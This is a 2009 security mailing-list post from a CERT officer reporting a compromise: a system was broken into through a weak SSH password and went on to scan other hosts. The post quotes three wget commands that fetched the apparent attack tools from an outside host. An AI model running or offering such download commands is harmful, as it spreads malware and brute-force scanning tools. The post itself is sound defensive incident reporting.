[nsp-sec] possible malware on sharlatan.ucoz.com
SURFcert - Peter
p.g.m.peters at utwente.nl
Thu Jul 2 07:19:22 EDT 2009
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Hi,
One of our user detected a password finder on his system. That system
was compromised by using a guessed (weak?) password. After the
compromise it started to scan other systems.
There was a file with account:password:IP-address information but none
of these systems are accessible through SSH at this moment. Most of them
are dynamic addresses and we have no timestamps.
It appears the software was downaloaded from sharlatan.ucoz.com:
wget sharlatan.ucoz.com/spaniol.tar
wget sharlatan.ucoz.com/udp.pl
wget sharlatan.ucoz.com/udp.plw
- --
Peter Peters
SURFcert Officer on Duty
cert at surfnet.nl http://cert.surfnet.nl/
office-hours: +31 302 305 305 emergency (24/7): +31 622 923 564
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iD8DBQFKTJe5elLo80lrIdIRAi5qAKCn7ottzqf45tq7eARg4pp0G5vLLwCfaWh/
EqZ/PZ1wButSt1yoi2jlxVQ=
=nvGp
-----END PGP SIGNATURE-----
More information about the nsp-security
mailing list